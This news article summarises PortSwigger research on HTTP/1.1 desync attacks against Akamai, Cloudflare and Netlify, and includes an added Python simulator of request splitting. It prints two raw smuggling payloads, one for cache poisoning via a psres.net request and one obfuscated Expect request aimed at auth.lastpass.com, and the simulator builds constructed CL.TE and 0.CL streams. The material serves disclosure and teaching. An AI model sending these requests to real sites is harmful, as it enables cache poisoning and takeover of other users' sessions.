The whitepaper "HTTP/1.1 Must Die: The Desync Endgame", by James Kettle of PortSwigger, reveals novel classes of HTTP request smuggling (desync) attack that exposed tens of millions of websites through critical vulnerabilities in major CDN infrastructures, including Akamai, Cloudflare, and Netlify.
The research introduces an enhanced open-source toolkit, HTTP Request Smuggler v3.0, which systematically detects parser discrepancies between front-end and back-end servers by probing four ways a request's length can be determined: Content-Length (CL), Transfer-Encoding (TE), implicit zero (0, where the parser assumes the request has no body), and HTTP/2's built-in framing length (H2).
The methodology proved highly effective, earning the researchers over $200,000 in bug bounties within two weeks.
A particularly striking discovery was the accidental compromise of 24 million websites through a desync in Cloudflare's own infrastructure.
The attack exploited HTTP/2 downgrading, where a front-end accepts HTTP/2 from the client but speaks HTTP/1.1 to the back-end, so the body of an HTTP/2 request can be read by the back-end as the start of a second request. The payload was simple:
```text
GET /assets/icon.png HTTP/2
Host: <redacted>

GET /assets HTTP/1.1
Host: psres.net
X: y
```
This H2.0 desync (HTTP/2 length on the front-end, implicit zero on the back-end) poisoned Cloudflare's cache with the response to the smuggled request, enabling persistent site takeover across millions of domains.
The research unveils two groundbreaking attack categories that bypass existing defenses.
0.CL desync attacks, in which the front-end sees no body (implicit zero) while the back-end honours Content-Length, were previously considered unexploitable: the back-end blocks waiting for body bytes that the front-end is holding back as the next request, so the upstream connection deadlocks. They were made viable through "early-response gadgets", endpoints that answer before the request body has been read.
On Windows IIS servers, researchers leveraged reserved filenames such as /con to trigger an immediate response without waiting for the request body.
Even more significantly, Expect-based desync attacks were discovered affecting numerous high-profile targets.
A vulnerability in Akamai's infrastructure, triggered by an obfuscated Expect header whose value is folded onto a continuation line beginning with whitespace (obs-fold), resulted in 74 separate bounty reports totaling $221,000:
```text
OPTIONS /anything HTTP/1.1
Host: auth.lastpass.com
Expect:
 100-continue
Content-Length: 39
```
This attack enabled serving arbitrary content to users of major websites, demonstrating the devastating potential of the CL.0 desync technique, in which the front-end honours Content-Length while the back-end treats the request as bodiless.
The research emphasizes that HTTP/1.1's fatal flaw lies in weak request boundaries: requests are simply concatenated on a reused connection, and the multiple ways of specifying a request's length create ambiguity about where one request ends and the next begins.
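The boundary ambiguity described above can be made concrete in a few lines. The following is an added example, not code from the paper or from HTTP Request Smuggler: a toy HTTP/1.1 splitter that applies one length rule at a time (Content-Length, chunked Transfer-Encoding, or implicit zero) and is fed constructed byte streams modelled on the H2.0, 0.CL and classic CL.TE cases. It does not model HTTP/2 framing itself, only the HTTP/1.1 stream a front-end produces after downgrading; the hostname victim.example, the /account path, the victim request and the byte counts are assumptions for illustration.

```python
# Added example (not the paper's code): how one HTTP/1.1 byte stream splits into
# different requests depending on which length rule the parser applies.


def chunked_body_length(data: bytes) -> int:
    """Length of a complete chunked body starting at data[0], final 0-chunk included.

    Trailers are not modelled. Raises ValueError if the framing is incomplete,
    which a real server would treat as "wait for more bytes".
    """
    pos = 0
    while True:
        line_end = data.find(b"\r\n", pos)
        if line_end == -1:
            raise ValueError("incomplete chunk-size line")
        size = int(data[pos:line_end].split(b";")[0], 16)
        pos = line_end + 2 + size + 2          # size line, chunk data, trailing CRLF
        if pos > len(data):
            raise ValueError("incomplete chunk data")
        if size == 0:
            return pos


def split_requests(stream: bytes, policy: str) -> list:
    """Split a raw HTTP/1.1 stream into (head, body) pairs under one length rule.

    policy "CL": honour Content-Length
    policy "TE": honour Transfer-Encoding: chunked
    policy "0" : implicit zero, every request is treated as bodiless

    A body of None means the parser is blocked waiting for bytes that have not
    arrived; between a front-end and a back-end that is the upstream deadlock
    which made 0.CL hard to exploit without an early-response gadget.
    """
    requests = []
    pos = 0
    while pos < len(stream):
        head_end = stream.find(b"\r\n\r\n", pos)
        if head_end == -1:
            requests.append((stream[pos:], None))      # incomplete head
            break
        head = stream[pos:head_end]
        headers = {}
        for line in head.split(b"\r\n")[1:]:
            name, _, value = line.partition(b":")
            headers[name.strip().lower()] = value.strip()
        body_start = head_end + 4
        try:
            if policy == "CL" and b"content-length" in headers:
                length = int(headers[b"content-length"])
            elif policy == "TE" and headers.get(b"transfer-encoding", b"").lower() == b"chunked":
                length = chunked_body_length(stream[body_start:])
            else:
                length = 0                             # implicit zero
        except ValueError:
            requests.append((head, None))
            break
        if body_start + length > len(stream):
            requests.append((head, None))              # declared body not fully received
            break
        requests.append((head, stream[body_start:body_start + length]))
        pos = body_start + length
    return requests


def request_lines(stream: bytes, policy: str) -> list:
    """First line of each request the parser sees, for side-by-side comparison."""
    return [head.split(b"\r\n", 1)[0] for head, _ in split_requests(stream, policy)]


# Constructed H2.0 scenario: the attacker's HTTP/2 request carried a body; the
# front-end downgraded it to HTTP/1.1 and added a Content-Length from the H2
# framing, but the back-end ignores Content-Length on GET (implicit zero).
SMUGGLED = b"GET /assets HTTP/1.1\r\nHost: psres.net\r\nX: y"
ATTACKER = (b"GET /assets/icon.png HTTP/1.1\r\nHost: victim.example\r\n"
            b"Content-Length: %d\r\n\r\n" % len(SMUGGLED) + SMUGGLED)
VICTIM = b"GET /account HTTP/1.1\r\nHost: victim.example\r\n\r\n"   # next user, same upstream socket
STREAM = ATTACKER + VICTIM

# Constructed 0.CL scenario: the front-end sees no body and forwards only the
# head; the back-end honours Content-Length and blocks. An endpoint like IIS's
# /con that answers before reading the body is what breaks the deadlock.
ZERO_CL = b"POST /con HTTP/1.1\r\nHost: victim.example\r\nContent-Length: 30\r\n\r\n"

# Constructed classic CL.TE: Content-Length covers 6 bytes, the chunked body
# ends after 5, so a TE parser is left holding a stray "G" as the next request.
CL_TE = (b"POST / HTTP/1.1\r\nHost: victim.example\r\nContent-Length: 6\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\nG")


if __name__ == "__main__":
    print("front-end (CL):", request_lines(STREAM, "CL"))
    print("back-end  (0): ", request_lines(STREAM, "0"))
    print("0.CL back-end body:", split_requests(ZERO_CL, "CL")[0][1])
    print("CL.TE back-end:", split_requests(CL_TE, "TE"))
```

Running it shows the desync directly: the front-end (CL) believes the second request on the connection is the victim's GET /account, while the back-end (0) answers a GET /assets for psres.net whose head has swallowed the victim's request line ("X: yGET /account HTTP/1.1"). A front-end that then caches that response under /account is the poisoning described above. In the 0.CL stream the back-end's body is None, the deadlock, and in the CL.TE stream the TE parser is left waiting on a request that begins with "G", the classic prefix injection.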
Unlike HTTP/1.1's text-based protocol, HTTP/2's binary framing carries a single unambiguous length for every request, which removes this ambiguity and makes desync attacks virtually impossible, but only when HTTP/2 is used end to end; a front-end that downgrades to HTTP/1.1 upstream reintroduces the problem, as the Cloudflare case shows.
Kettle argues that upstream HTTP/2 adoption is the only viable long-term solution, as six years of implementation patches since request smuggling resurfaced in 2019 have failed to address the protocol's fundamental design flaw.
The research concludes with a call to action: organizations must transition to upstream HTTP/2 to eliminate this persistent threat that continues to expose millions of websites worldwide.
The post Critical HTTP/1.1 Flaw Puts Millions of Websites at Risk of Takeover appeared first on Cyber Security News.